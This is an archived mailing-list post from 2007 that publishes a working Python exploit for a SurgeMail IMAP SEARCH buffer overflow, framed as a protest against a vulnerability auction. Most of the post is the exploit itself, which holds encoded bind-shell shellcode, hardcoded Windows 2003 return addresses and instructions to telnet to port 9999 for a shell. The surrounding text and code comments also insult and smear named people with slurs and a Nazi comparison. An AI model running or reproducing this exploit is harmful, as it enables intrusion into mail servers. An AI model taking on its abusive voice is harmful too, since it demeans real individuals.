[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20070813211935.16850DA81F@mailserver7.hushmail.com>
Date: Mon, 13 Aug 2007 17:19:32 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>,<bugtraq@...urityfocus.com>
Subject: Stop WabiSabiLabi Hacker Oppression NOW
Dear Lenny Rose and Friends,
!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!
!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!
!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!
Attached and inline please find an exploit for the Surgemail 38k
0day vulnerability being sold for auction by WabiSabiLabi. [1]
I find it humorous that someone might have received money for even
a reliable exploit for this bug. This exploit was hacked together
in an afternoon and will likely only work on Windows 2K3. As most
bugs with WabiSabiLabi, this shitty IMAP vulnerability requires
credentials for exploitation. To anyone who intended to bid on this
item: stop!
I am calling on all of those capable to help destroy this
WabiSabiLabi nonsense. There are only PHP bugs left on the auction
block for now, so maybe Stefan Esser, the Brad Spengler [2] of web
programming languages, can step up here and kill some bugs for a
GOOD cause for once in his life. End hacker oppression, destroy
WabiSabiLabi!
To anyone who is dumb enough to sell bugs through WabiSabiLabi: you
are dumb LOLOLOLOL!
For those of you who missed the previous WabiSabiLabi item that was
exposed, famous male scenewhore str0ke was kind enough to mirror
the exploit on his Internet homepage, milw0rm. [4]
J
[1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do
[2] Brad Spengler is an arrogant prick. [3]
[3] http://m00.blackhat.ru/misc/spender-lol.log
[4] http://milw0rm.com/exploits/4222
__ BEGIN HACKING PROGRAM __
#!/usr/bin/python
import os
import sys
import time
import socket
import struct
#this is imap exploit
#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor
of megacanvas
sc = "\x90"
sc +=
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59"
sc +=
"\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc +=
"\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30"
sc +=
"\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30"
sc +=
"\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b"
sc +=
"\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b"
sc +=
"\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c"
sc +=
"\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b"
sc +=
"\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b"
sc +=
"\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70"
sc +=
"\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b"
sc +=
"\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b"
sc +=
"\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b"
sc +=
"\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b"
sc +=
"\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b"
sc +=
"\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b"
sc +=
"\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48"
sc +=
"\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36"
sc +=
"\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33"
sc +=
"\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d"
sc +=
"\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35"
sc +=
"\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62"
sc +=
"\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47"
sc +=
"\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53"
sc +=
"\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47"
sc +=
"\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44"
sc +=
"\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50"
sc +=
"\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e"
sc +=
"\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50"
sc +=
"\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46"
sc +=
"\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78"
sc +=
"\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45"
sc +=
"\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63"
sc +=
"\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c"
sc +=
"\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30"
sc +=
"\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c"
sc +=
"\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38"
sc +=
"\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f"
sc +=
"\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a"
sc +=
"\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68"
sc +=
"\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a"
sc +=
"\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c"
sc +=
"\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30"
sc +=
"\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56"
sc += "\x79\x6f\x4e\x30\x66"
def Copulate(target,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
return s
def Fascism(target,u,p):
safe_readable_null = 0x71c010e4 # Safe readable, preferably
null (ws2_32 on win2k3)
safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data
section on win2k3)
pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on
win2k3)
call_esp = 0x77e839b3 # Return #2, call esp in kernel32.
When hit, esp points at the next 4 bytes.
s = Copulate(target,143)
pkt = "0001 LOGIN \""
pkt += u
pkt += "\" \""
pkt += p
pkt += "\"\r\n"
SendPacket(s,pkt)
pkt = "0003 SELECT \"Inbox\"\r\n"
SendPacket(s,pkt)
pkt = "C284 SEARCH "
pkt += "P"*1008
pkt += struct.pack('<L',safe_readable_null)
pkt += "CUNT" # Word used to describe members of the
infosec community.
pkt += struct.pack('<L',pop_then_ret)
pkt += struct.pack('<L',safe_writable)
pkt += struct.pack('<L',call_esp)
pkt += "A"*198 # I have boned over 198 bitches
pkt += "\xeb\x10" # Body Mass Index of Gadi Evron,
hexadecimal LOLOLOLOL
pkt += struct.pack('<L',safe_readable_null)
pkt += "A"*16 # Unnecessary megathropic nopsled, invented
by k2, founding member of n3td3v
pkt += sc
pkt += " (SAVE MIN) SINCE 12-Feb-1992 NOT FROM \"Len Rose
The Moderating Nazi of Full Disclosure, Original Founder of Zyklon
B\"\r\n"
print "Sending. Hold on."
SendPacket(s,pkt)
time.sleep(3)
print "The service will continue functioning but cannot be
exploited again until restart."
print "Please telnet to port 9999 on it now for a
rootshell."
print " -management"
s.close()
def SendPacket(s,pkt):
s.send(pkt) # comment
if __name__ == '__main__':
try:
target = sys.argv[1]
u = sys.argv[2]
p = sys.argv[3]
except IndexError:
print 'Usage: %s <ip address> <user> <pass>' %
sys.argv[0]
sys.exit(-1)
Fascism(target,u,p)
--
Click for free information on accounting careers, $150/hour potential.
http://tagline.hushmail.com/fc/Ioyw6h4dCeQhJTFTg28sH8XxHbARovnjMaM8FeFwtiew6tjcPaO7he/
Download attachment "SURGEMAIL.py" of type "application/octet-stream" (5359 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists